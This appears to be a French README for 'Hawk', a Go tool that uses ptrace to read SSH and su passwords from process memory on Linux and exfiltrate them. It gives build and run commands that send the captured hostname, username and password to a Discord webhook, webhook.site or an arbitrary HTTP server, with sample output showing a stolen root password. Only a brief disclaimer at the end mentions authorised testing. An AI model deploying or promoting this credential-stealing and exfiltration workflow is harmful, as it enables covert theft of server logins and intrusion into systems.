
Outil Golang conçu pour exfiltrer les mots de passe trouvés via les services sshd et su
Intercepter silencieusement les identifiants SSH et SU en temps réel
Hawk surveille les processus sshd et su, extrayant les mots de passe de la mémoire via ptrace sans modifier les processus cibles. Zéro écriture. Collecte d'identifiants en lecture seule pure.

Hawk exploite le système de fichiers /proc de Linux pour découvrir les processus SSH et SU, puis utilise ptrace pour s'y attacher et intercepter les appels système. Lorsqu'une authentification par mot de passe se produit, il lit le mot de passe directement depuis la mémoire du processus pendant l'appel système write()—de manière totalement transparente pour le processus cible. Les identifiants sont exfiltrés via un webhook ou affichés sur stdout.
Pour aller plus loin : Article de blog
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk détecte automatiquement les webhooks Discord et envoie des messages formatés :
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
Configuration : Créez un webhook dans votre serveur Discord en suivant le guide des webhooks Discord. Les identifiants apparaîtront dans votre canal formatés avec le nom d'hôte, le nom d'utilisateur et le mot de passe.
Pour les autres services de webhook (webhook.site, serveurs personnalisés, etc.) :
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path
Pas de webhook ? Les identifiants sont affichés sur stdout :
./hawk
Sortie :
hostname=server01 username=root password=SuperSecret123
/proc montéCet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.